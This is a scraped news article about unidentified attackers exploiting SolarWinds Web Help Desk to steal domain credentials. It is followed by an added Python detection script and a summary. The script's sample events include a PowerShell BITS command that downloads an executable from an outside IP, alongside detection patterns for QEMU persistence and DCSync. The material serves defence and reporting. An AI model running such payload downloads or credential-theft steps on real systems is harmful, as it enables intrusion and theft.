Article Details

Scrape Timestamp (UTC): 2026-02-09 21:59:51.695

Source: https://www.theregister.com/2026/02/09/solarwinds_mystery_whd_attack/

Original Article Text


Someone's attacking SolarWinds WHD to steal high-privilege credentials - but we don't know who or how

So many CVEs, so little time.

Digital intruders exploited buggy SolarWinds Web Help Desk (WHD) instances in December to break into victims' IT environments, move laterally, and steal high-privilege credentials, according to Microsoft researchers. But one mystery remains: which flaw in the popular help-desk ticketing app did the unknown miscreants abuse in these attacks?

"We have not yet confirmed whether the attacks are related to the most recent set of WHD vulnerabilities disclosed on January 28, 2026, such as CVE-2025-40551 and CVE-2025-40536 or stem from previously disclosed vulnerabilities like CVE-2025-26399," the threat hunters said in a Friday blog. "Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold."

Redmond's team said it continues to investigate the intrusions and will update the analysis as it learns more. The researchers declined to answer The Register's inquiries about these attacks, including how many organizations' WHD instances had been compromised. SolarWinds did not immediately respond to our request for comment.

CVE-2025-40551 is a critical untrusted-deserialization flaw that can lead to remote code execution, allowing a remote, unauthenticated attacker to execute OS commands on the affected system. It earned a 9.8 CVSS rating, and about a week after the vendor issued a security advisory urging customers to patch the vulnerability, the US Cybersecurity and Infrastructure Security Agency added the bug to its Known Exploited Vulnerabilities catalog and gave federal agencies just three days to patch the security hole.

At the same time, SolarWinds patched CVE-2025-40536, a high-severity (8.1 CVSS) security-control bypass vulnerability that can allow an unauthenticated attacker to gain access to certain restricted functionality. This one hasn't yet appeared on CISA's exploited-bugs catalog.

Meanwhile, CVE-2025-26399 is a critical, 9.8-severity flaw that also allows remote, unauthenticated attackers to run commands on a host machine. SolarWinds attempted to patch this one three times before the fix finally worked. "This vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986," SolarWinds noted in its disclosure. Criminals exploited both of those earlier vulnerabilities.

While Microsoft hasn't yet determined which of these vulnerabilities the intruders used in the December attacks, the security sleuths say that after exploiting one of the SolarWinds WHD bugs, the compromised devices spawned PowerShell to abuse the Background Intelligent Transfer Service (BITS) for payload download and execution.

BITS is a built-in Windows operating system feature used to manage file transfers between machines. As with several other legitimate Microsoft features, attackers have found a way to use BITS for mischief – in this case, downloading and executing malware. It's an example of a technique defenders call "living off the land": using legitimate administrative tools that are already installed on victims' machines for malicious purposes, rather than custom malware, which is more likely to be detected and blocked by antivirus software.

Microsoft noted that on "several hosts," the attackers also downloaded and installed Zoho ManageEngine, a legitimate remote monitoring and management (RMM) product, to provide long-term, remote control of the compromised system. Then, using this remote management tool, the intruders enumerated sensitive domain users and groups, including Domain Admins, and established reverse SSH and RDP access for persistence.

"In some environments, Microsoft Defender also observed and raised alerts flagging attacker behavior on creating a scheduled task to launch a QEMU virtual machine under the SYSTEM account at startup, effectively hiding malicious activity within a virtualized environment while exposing SSH access via port forwarding," the researchers wrote.

Additionally, in some cases, the attackers used DLL sideloading to access Windows Local Security Authority Subsystem Service (LSASS) memory and steal credentials. "In at least one case, activity escalated to DCSync from the original access host, indicating use of high-privilege credentials to request password data from a domain controller," according to the blog.

If you haven't already: apply the WHD patches now, and remove public access to admin paths. Security teams should also scan for and evict unauthorized RMM tools, specifically ManageEngine RMM artifacts such as ToolsIQ.exe, Microsoft suggests. It's also a good idea to rotate credentials – Redmond recommends starting with service and admin accounts reachable from WHD – and isolate any known compromised hosts.
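The post-exploitation behaviours described above (PowerShell driving a BITS download, a scheduled task that starts QEMU as SYSTEM at boot, the ToolsIQ.exe RMM artifact, and a DCSync replication request from a host that is not a domain controller) are the kind of thing a hunt team would codify as detections and feed into the "isolate known compromised hosts" step. The Python triage script below is an added example written for this page; it is not code from Microsoft's blog, The Register, or SolarWinds. The event records are constructed samples, the host names and the `KNOWN_DOMAIN_CONTROLLERS` inventory are assumptions, and the dictionary field names model a generic SIEM export rather than any product's real schema.

```python
"""Triage constructed endpoint/AD events for the WHD post-exploitation pattern.

Added example: events, host names and the DC inventory are assumptions, not
real telemetry. Field names ("type", "host", "cmdline", ...) are a generic
model of a SIEM export, not a vendor schema.
"""
import re
from dataclasses import dataclass

# Well-known control-access right GUIDs that a DCSync-style request presents
# in a Windows 4662 (directory service access) event.
DS_REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

# Assumption: the defender's own inventory of legitimate domain controllers.
KNOWN_DOMAIN_CONTROLLERS = {"DC01", "DC02"}

BITS_PATTERN = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.I)
URL_PATTERN = re.compile(r"https?://", re.I)
QEMU_PATTERN = re.compile(r"qemu-system-[a-z0-9_]+(\.exe)?", re.I)
SYSTEM_ACCOUNTS = {"system", "nt authority\\system"}
STARTUP_TRIGGERS = {"boot", "startup"}


@dataclass(frozen=True)
class Finding:
    host: str    # host to contain (for DCSync: the requesting client, not the DC)
    rule: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev):
    """PowerShell abusing BITS to fetch a remote payload, or the ToolsIQ.exe RMM artifact."""
    image = _basename(ev["image"])
    cmd = ev.get("cmdline", "")
    if image in ("powershell.exe", "pwsh.exe") and BITS_PATTERN.search(cmd) and URL_PATTERN.search(cmd):
        return Finding(ev["host"], "bits_download_via_powershell", cmd)
    if image == "toolsiq.exe":
        return Finding(ev["host"], "unauthorized_rmm_artifact", ev["image"])
    return None


def check_scheduled_task(ev):
    """A task that launches a QEMU VM under SYSTEM at startup."""
    if (ev["run_as"].lower() in SYSTEM_ACCOUNTS
            and ev["trigger"].lower() in STARTUP_TRIGGERS
            and QEMU_PATTERN.search(ev["action"])):
        return Finding(ev["host"], "qemu_vm_system_startup_task", f"{ev['name']}: {ev['action']}")
    return None


def check_ds_access(ev):
    """Replication rights requested by a machine that is not a known DC (DCSync)."""
    requested = {p.lower() for p in ev["properties"]}
    if requested & DS_REPLICATION_GUIDS and ev["client_host"].upper() not in KNOWN_DOMAIN_CONTROLLERS:
        return Finding(ev["client_host"], "dcsync_from_non_dc", f"{ev['account']} via {ev['host']}")
    return None


CHECKS = {"process": check_process, "scheduled_task": check_scheduled_task, "ds_access": check_ds_access}


def triage(events):
    """Run every applicable check and return the findings in event order."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev["type"])
        finding = check(ev) if check else None
        if finding:
            findings.append(finding)
    return findings


def hosts_to_isolate(findings):
    """Distinct hosts with at least one finding, sorted for a containment ticket."""
    return sorted({f.host for f in findings})


# Constructed sample events (not real telemetry). Two of them are benign noise.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WHD01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Start-BitsTransfer -Source http://203.0.113.10/upd.dat -Destination C:\Users\Public\upd.exe"'},
    {"type": "process", "host": "WHD01", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"type": "scheduled_task", "host": "WHD01", "name": r"\Microsoft\Windows\Svc\Update", "run_as": "SYSTEM",
     "trigger": "boot", "action": r"C:\ProgramData\qemu\qemu-system-x86_64.exe -hda C:\ProgramData\qemu\disk.qcow2"},
    {"type": "scheduled_task", "host": "FS01", "name": "NightlyBackup", "run_as": "SYSTEM",
     "trigger": "daily", "action": r"C:\Tools\backup.exe"},
    {"type": "process", "host": "FS01", "image": r"C:\Program Files\ManageEngine\ToolsIQ.exe", "cmdline": "ToolsIQ.exe"},
    {"type": "ds_access", "host": "DC01", "client_host": "WHD01", "account": "CORP\\svc-whd",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"type": "ds_access", "host": "DC01", "client_host": "DC02", "account": "CORP\\DC02$",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
]

if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for f in results:
        print(f"{f.host:6} {f.rule:32} {f.detail}")
    print("isolate:", ", ".join(hosts_to_isolate(results)))
```

On the constructed sample the script raises four findings (the BITS download and the QEMU task on WHD01, ToolsIQ.exe on FS01, and the DCSync request originating from WHD01) and nominates WHD01 and FS01 for containment, while the benign `cmd.exe`, the daily backup task and the DC-to-DC replication produce nothing. The DCSync check attributes the finding to the requesting client rather than the domain controller that logged it, since the client is the host that holds the stolen high-privilege credential.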

Daily Brief Summary

VULNERABILITIES // SolarWinds WHD Exploited to Steal High-Privilege Credentials

Microsoft researchers identified attacks on SolarWinds Web Help Desk (WHD) instances in December 2025, exploiting vulnerabilities to steal high-privilege credentials and move laterally within IT environments.

The specific vulnerability used remains unidentified, though recent and past CVEs, including CVE-2025-40551 and CVE-2025-26399, are under scrutiny for potential involvement.

Attackers utilized PowerShell and the Background Intelligent Transfer Service (BITS) for payload download and execution, a tactic known as "living off the land" to evade detection.

Compromised systems showed unauthorized installation of Zoho ManageEngine, enabling long-term remote control and access to sensitive domain users and groups.

Microsoft Defender detected attackers creating scheduled tasks to run virtual machines, concealing malicious activities and maintaining persistence through reverse SSH and RDP access.

Organizations are urged to apply WHD patches, restrict public access to admin paths, and remove unauthorized RMM tools to mitigate further risks.

Security teams should rotate credentials, particularly service and admin accounts linked to WHD, and isolate compromised hosts to prevent further breaches.